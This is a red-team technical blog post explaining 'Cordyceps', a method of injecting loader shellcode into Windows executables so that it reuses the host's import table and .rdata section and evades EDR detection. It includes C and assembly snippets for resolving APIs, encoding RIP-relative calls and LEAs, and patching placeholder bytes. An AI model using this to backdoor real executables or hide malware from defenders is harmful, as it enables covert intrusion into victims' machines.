Cordyceps: Shellcode in EXE Injection
Stealthy shellcode injection into executables to bypass EDR.
Intro
One of the most important goals for a RedTeamer is to get Initial Access (IA), aka Remote Code Execution (RCE), on a host, typically a Windows client. A common technique is to send malicious files to a victim which, when opened, execute our payload.
There are many different file types used for this, like ISO, MSI, JS, LNK, VBA…
But I want to focus on EXE (and DLL) files.
This is part of a three-article series:
- See Supermega for an introduction on how to use the SuperMega loader laboratory
- See How EDR works for a discussion of EDR detection principles
- Cordyceps EXE Injection for a discussion of Cordyceps approaches (this)
I published the source code at github.com/dobin/SuperMega.
About this technique
The idea is to integrate shellcode more deeply into existing EXEs. It takes advantage of everything the victim EXE already provides, and hopefully allows the loader (carrier & payload) to stay under the radar.
The carrier also resides in an IMAGE section, which makes it more trustworthy.
This can be compared to DLL-Stomping or Process-Hollowing.
Advantages of Backdooring EXEs
Injecting shellcode into an EXE has a few advantages. It keeps most of the original data intact:
- No PEB walk, including API hashing or similar
- Original Imports / IAT
- Code similarity analysis defeated (machine-learning-based detection)
- No need for good-code stuffing
- Loader execution in an IMAGE memory region
  - No call stack spoofing required
  - Thread origins are IMAGE
Shellcode Injection into PE
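Shellcode on Windows normally does not issue syscalls directly (syscall numbers change between Windows versions), but uses the functions of ntdll.dll, kernel32.dll and other DLLs mapped in each process. This requires a technique that I call peb_walk, which resolves the function addresses by DLL and function name.
A typical writeup is Finding Kernel32 Base and Function Addresses in Shellcode.
It usually involves walking the list of loaded modules in the process PEB to find a DLL's base address, parsing that DLL's export table, and then invoking GetProcAddress().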
From the perspective of the loader shellcode, using our peb_walk resolver could look somewhat like this:
// Resolve kernel32.dll and two bootstrap functions via the peb_walk helpers
LPVOID base = get_module_by_name((const LPWSTR)L"kernel32.dll");
LPVOID load_lib = get_func_by_name((HMODULE)base, (LPSTR)"LoadLibraryA");
LPVOID get_proc = get_func_by_name((HMODULE)base, (LPSTR)"GetProcAddress");
HMODULE(WINAPI * _LoadLibraryA)(LPCSTR lpLibFileName)
    = (HMODULE(WINAPI*)(LPCSTR)) load_lib;
FARPROC(WINAPI * _GetProcAddress)(HMODULE hModule, LPCSTR lpProcName)
    = (FARPROC(WINAPI*)(HMODULE, LPCSTR)) get_proc;
// Every further API is resolved by name through _GetProcAddress
DWORD (WINAPI * _GetEnvironmentVariableW)(
    _In_opt_ LPCWSTR lpName,
    _Out_opt_ LPWSTR lpBuffer,
    _In_ DWORD nSize) = (DWORD (WINAPI*)(LPCWSTR, LPWSTR, DWORD))
        _GetProcAddress((HMODULE)base, "GetEnvironmentVariableW");
...
The code queries the addresses of all the exported DLL functions it requires. The exact details of how peb_walk works are not important here, but it requires a substantial amount of code.
But when we inject shellcode into an EXE, what stops us from calling the DLL functions directly, like the normal code of the executable does? Like in the trivial example call &MessageBoxW.
As it turns out, nothing stops us from doing this ourselves.
Cordyceps - shellcode fixups to re-use IAT
All the DLLs and functions the EXE requires are listed in the import directory of the PE file: a list of DLL names, each having a list of function names to import. Each imported function has an entry in the IAT (Import Address Table). The code does not know at which address the DLL function it wants to call is located, so it performs an indirect call through the function's fixed IAT entry. The Windows loader resolves the imports when the EXE is loaded and writes each function's address into its IAT entry (for delay-loaded imports, the entry initially points to a resolver stub, which writes the real address on the first call).
The nice thing is that the call from the .text section to the IAT is RIP-relative (debuggers and disassemblers “hide” this fact by showing the absolute target). It is not affected by ASLR, as all PE sections are loaded and randomized as one blob, so the distance between them never changes. Therefore we can fix up our injected shellcode so it reuses the IAT instead of doing a peb_walk.
IAT call example
In the following example, the call at address 0x140001017 reads its target from the IAT entry at 0x140002080.
That entry holds 0x7FF82168AEE0, the address of the MessageBoxW() function in user32.dll, but we don't care about that value.
The MessageBoxW IAT entry is at RVA 0x2080.
The offset, as seen in the little-endian call encoding, is 0x1063:
0x140002080 - 0x140001017 - 6 = 0x1063
Note that RIP already points to the next instruction to be executed, so we have to adjust the offset by the length of the call instruction, which is 6 bytes.
Debuggers and disassemblers usually hide this low-level stuff.
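The offset arithmetic can be written as a small C helper. This is a sketch for illustration, not code from SuperMega; the name iat_call_rel32 is hypothetical. It also shows why ASLR does not matter: only the difference between the two addresses enters the result, so VAs, RVAs or a shifted image base all give the same displacement.

```c
#include <stdint.h>

/* Length of "call qword ptr [rip + disp32]": ff 15 plus a 4-byte displacement. */
#define IAT_CALL_LEN 6

/* Hypothetical helper: displacement for an indirect call at call_addr that
 * reads its target from the IAT entry at iat_entry_addr. The CPU adds the
 * displacement to RIP, which already points at the next instruction, so the
 * instruction length is subtracted. Assumes both addresses lie in the same
 * PE image, i.e. well within +/-2 GiB of each other. */
static int32_t iat_call_rel32(uint64_t call_addr, uint64_t iat_entry_addr)
{
    return (int32_t)(uint32_t)(iat_entry_addr - (call_addr + IAT_CALL_LEN));
}
```

For example, iat_call_rel32(0x140001017, 0x140002080) and iat_call_rel32(0x1017, 0x2080) both yield 0x1063.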
Cordyceps: IAT Fixup step by step
So we can create this call ourselves by patching the shellcode injected into the EXE. I call this the Cordyceps technique.
The issue is that the MASM assembler cannot create this call: it knows neither the address the instruction will end up at nor the address of the target IAT entry. So instead, I patch the assembly source code, replacing the original call with a placeholder of random bytes. Then, in the resulting EXE, I patch the placeholder with the correct relative call.
As an example, let’s call VirtualAlloc() via the IAT from our shellcode.
The C source:
char *dest = VirtualAlloc(NULL, 433, 0x3000, p_RW);
The ASM code generated by cl.exe from the C source:
mov r9d, 4
mov r8d, 12288 ; 00003000H
mov edx, 433 ; 000001b1H
xor ecx, ecx
call QWORD PTR __imp_VirtualAlloc
Note that __imp_VirtualAlloc refers to an external symbol, which would be resolved when linking the ASM source. Let’s replace it with a placeholder of random bytes, in this case c5 db d7 0a ec af (6 bytes, the same length as the final call):
mov r9d, 4
mov r8d, 12288 ; 00003000H
mov edx, 433 ; 000001b1H
xor ecx, ecx
DB 0c5H, 0dbH, 0d7H, 00aH, 0ecH, 0afH ; IAT Reuse for VirtualAlloc
After injecting the shellcode into the target EXE, replace the placeholder bytes with a newly constructed call to the correct IAT entry:
ff 15 f3 dd 0a 00 call qword ptr [rip + 0xaddf3]
Let’s get the offset from the instruction bytes ff 15 f3 dd 0a 00: ff 15 encodes call qword ptr [rip + disp32], and f3 dd 0a 00 is the offset in little endian; reversed, that is 00 0a dd f3 = 0x0addf3.
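Going the other way, a minimal C sketch can read the little-endian displacement out of the instruction bytes and recover the IAT entry the call reads from. The helper names read_le32 and decode_iat_call are hypothetical and not taken from SuperMega; the sketch assumes the instruction is exactly the 6-byte ff 15 form.

```c
#include <stdint.h>

/* Read a little-endian 32-bit signed value from four bytes. */
static int32_t read_le32(const uint8_t *p)
{
    uint32_t v = (uint32_t)p[0]
               | ((uint32_t)p[1] << 8)
               | ((uint32_t)p[2] << 16)
               | ((uint32_t)p[3] << 24);
    return (int32_t)v;
}

/* Hypothetical helper: given the 6 bytes of "call qword ptr [rip + disp32]"
 * located at insn_addr, return the address of the IAT entry it reads from,
 * or 0 if the bytes are not of the ff 15 form. */
static uint64_t decode_iat_call(const uint8_t insn[6], uint64_t insn_addr)
{
    if (insn[0] != 0xff || insn[1] != 0x15)
        return 0;
    int32_t disp = read_le32(insn + 2);
    /* RIP-relative: target = address of the next instruction + displacement */
    return insn_addr + 6 + (int64_t)disp;
}
```

Fed the bytes ff 15 f3 dd 0a 00 at VA 0x14006FB5F, this returns 0x14011D958, the VirtualAlloc IAT entry shown in the build log.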
Log message when building:
(injector.py ) Replace c5dbd70aecaf at VA 0x14006FB5F with: call to IAT at VA 0x14011D958 (VirtualAlloc)
(asmdisasm.py) [00000000] ff 15 f3 dd 0a 00 call qword ptr [rip + 0xaddf3]
The relative call offset was calculated like this (the VAs below work just as well as RVAs, since only their difference matters):
relative_offset = dest_iat_function_rva - current_instruction_rva - 6
= 0x14011D958 - 0x14006FB5F - 6 = 0x0ADDF3
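The injector step from the log above could be sketched in C like this: find the placeholder in the section bytes, compute the VA where it landed, and overwrite it with the encoded call. This is a hypothetical illustration (the name patch_iat_placeholder and its parameters are assumptions), not how injector.py is actually implemented. It assumes the section bytes are laid out as they will be mapped, starting at section_va.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical helper: locate a 6-byte placeholder inside a section buffer
 * and overwrite it with "call qword ptr [rip + disp32]" targeting the IAT
 * entry at iat_entry_va. section_va is the VA at which buf[0] is mapped.
 * Returns 0 on success, -1 if the placeholder is missing or not unique. */
static int patch_iat_placeholder(uint8_t *buf, size_t len, uint64_t section_va,
                                 const uint8_t placeholder[6], uint64_t iat_entry_va)
{
    size_t found = (size_t)-1;
    for (size_t i = 0; i + 6 <= len; i++) {
        if (memcmp(buf + i, placeholder, 6) == 0) {
            if (found != (size_t)-1)
                return -1;            /* ambiguous: placeholder occurs twice */
            found = i;
        }
    }
    if (found == (size_t)-1)
        return -1;

    uint64_t insn_va = section_va + found;
    /* RIP points past the 6-byte call when the displacement is applied. */
    uint32_t disp = (uint32_t)(iat_entry_va - (insn_va + 6));

    uint8_t *p = buf + found;
    p[0] = 0xff;                      /* opcode: CALL r/m64 (FF /2) */
    p[1] = 0x15;                      /* ModRM: mod=00, reg=2, rm=101 -> [rip + disp32] */
    p[2] = (uint8_t)(disp & 0xff);    /* disp32, little endian */
    p[3] = (uint8_t)((disp >> 8) & 0xff);
    p[4] = (uint8_t)((disp >> 16) & 0xff);
    p[5] = (uint8_t)((disp >> 24) & 0xff);
    return 0;
}
```

Refusing a placeholder that occurs more than once is a design choice of this sketch: random bytes could in principle also appear elsewhere in the section, and patching the wrong spot would corrupt the code.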
Result:
- No more peb_walk signatures (no LoadLibrary(), no GetProcAddress(), etc.)
- No telemetry generated by a peb_walk
.rdata data reference: The Problem
Shellcode must contain the data it needs for its function calls embedded in its code. This can look highly suspicious.
One option is to encode the data as instructions that build the strings on the stack at runtime, and then reference them relative to the stack pointer RSP. The compiler can be forced to generate this by using the following trick:
wchar_t kernel32_dll_name[] = { 'k','e','r','n','e','l','3','2','.','d','l','l', 0 };
This makes the compiler generate the following code:
mov eax, 107 ; 0000006bH k
mov WORD PTR kernel32_dll_name$[rsp], ax
mov eax, 101 ; 00000065H e
mov WORD PTR kernel32_dll_name$[rsp+2], ax
mov eax, 114 ; 00000072H r
mov WORD PTR kernel32_dll_name$[rsp+4], ax
mov eax, 110 ; 0000006eH n
mov WORD PTR kernel32_dll_name$[rsp+6], ax
mov eax, 101 ; 00000065H e
mov WORD PTR kernel32_dll_name$[rsp+8], ax
mov eax, 108 ; 0000006cH l
mov WORD PTR kernel32_dll_name$[rsp+10], ax
mov eax, 51 ; 00000033H 3
mov WORD PTR kernel32_dll_name$[rsp+12], ax
mov eax, 50 ; 00000032H 2
mov WORD PTR kernel32_dll_name$[rsp+14], ax
mov eax, 46 ; 0000002eH .
mov WORD PTR kernel32_dll_name$[rsp+16], ax
mov eax, 100 ; 00000064H d
mov WORD PTR kernel32_dll_name$[rsp+18], ax
mov eax, 108 ; 0000006cH l
mov WORD PTR kernel32_dll_name$[rsp+20], ax
mov eax, 108 ; 0000006cH l
mov WORD PTR kernel32_dll_name$[rsp+22], ax
xor eax, eax ; \x00
mov WORD PTR kernel32_dll_name$[rsp+24], ax
lea rcx, QWORD PTR kernel32_dll_name$[rsp]
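Alternatively, a different technique stores the strings inline in the .text section as bytes and uses a CALL to jump over them; the return address pushed by the CALL is the address of the string, which is then popped into a register: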
lea rax, QWORD PTR msg_content$[rsp]
CALL after_$SG72694
$SG72694 DB 'Hello World!', 00H
after_$SG72694:
POP rcx
.rdata data reference: Solution
What stops us from putting our data into another section, let’s say .rdata, and replacing the references? All sections, including .rdata, are ASLR’d together, so the distance between .text and .rdata never changes.
So a RIP-relative LEA from .text to .rdata is possible (and common in normal code).
A string reference in C:
wchar_t envVarName[] = L"USERPROFILE";
When compiled into text ASM, it will look like this:
$SG72731 DB 'U', 00H, 'S', 00H, 'E', 00H, 'R', 00H, 'P', 00H, 'R', 00H
DB 'O', 00H, 'F', 00H, 'I', 00H, 'L', 00H, 'E', 00H, 00H, 00H
...
lea rcx, OFFSET FLAT:$SG72731
mov rdi, rax
mov rsi, rcx
mov ecx, 24
rep movsb
Remove the $SG* data from the assembly, and replace the LEA with a placeholder of random bytes (7 bytes, the length of the final LEA):
DB 094H, 041H, 00aH, 029H, 0f3H, 03bH, 018H ; .rdata Reuse for $SG72731 (rcx)
mov rdi, rax
mov rsi, rcx
mov ecx, 24
rep movsb
Then patch the shellcode in the binary after it has been injected: replace 0x94 0x41 0x0a 0x29 0xf3 0x3b 0x18 with lea <reg>, [rip + offset], where the offset is relative to the address of the next instruction.
Patched carrier shellcode in injected binary:
Log of adding the string to .rdata:
(injector.py ) Handling DataReuse Fixup: $SG72731 <- 94410a29f33b18
(injector.py ) Add to .rdata at 0x14011EAA9 (1174185): $SG72731: USERPROFILE
Log of patching the LEA referencing the above data:
(injector.py ) Replace bytes 94410a29f33b18 at VA 0x14008E73E with: LEA rcx .rdata 0x14011EAA9
(asmdisasm.py ) [14008e73e] 48 8d 0d 64 03 09 00 lea rcx, [rip + 0x90364]
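The LEA from the log above can be reproduced with a small C encoder for lea r64, [rip + disp32]: a REX.W prefix (plus REX.R for r8 to r15), opcode 8d, and a ModRM byte with mod=00 and rm=101, which selects RIP-relative addressing in 64-bit mode. The helper name encode_lea_rip is hypothetical and not part of SuperMega; the sketch assumes a 64-bit destination register.

```c
#include <stdint.h>

/* Hypothetical helper: encode "lea r64, [rip + disp32]" (7 bytes) into out.
 * reg is the x86-64 register number: 0=rax, 1=rcx, 2=rdx, 3=rbx, 4=rsp,
 * 5=rbp, 6=rsi, 7=rdi, 8..15=r8..r15. insn_va is where the LEA will sit,
 * data_va is where the string was placed in .rdata. Returns the length. */
static int encode_lea_rip(uint8_t out[7], unsigned reg,
                          uint64_t insn_va, uint64_t data_va)
{
    /* RIP points to the next instruction, 7 bytes after the LEA start. */
    uint32_t disp = (uint32_t)(data_va - (insn_va + 7));
    out[0] = (uint8_t)(0x48 | ((reg & 8) ? 0x04 : 0x00)); /* REX.W, REX.R for r8..r15 */
    out[1] = 0x8d;                                          /* opcode: LEA */
    out[2] = (uint8_t)(((reg & 7) << 3) | 0x05);            /* ModRM: [rip + disp32] */
    out[3] = (uint8_t)(disp & 0xff);                        /* disp32, little endian */
    out[4] = (uint8_t)((disp >> 8) & 0xff);
    out[5] = (uint8_t)((disp >> 16) & 0xff);
    out[6] = (uint8_t)((disp >> 24) & 0xff);
    return 7;
}
```

encode_lea_rip(out, 1, 0x14008E73E, 0x14011EAA9) produces 48 8d 0d 64 03 09 00, matching the disassembly in the log.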
Summary
So what is Cordyceps? Nothing more than injecting shellcode into an EXE file, and then making it call functions via the IAT and reference data in .rdata, exactly like the normal code of an EXE without injected shellcode.
This makes it hard for an EDR to detect anything suspicious that would trigger it to perform a more detailed analysis or scan.
All calls coming from the carrier originate from an IMAGE memory region. No DLL resolving with a peb_walk is needed, which generates less telemetry.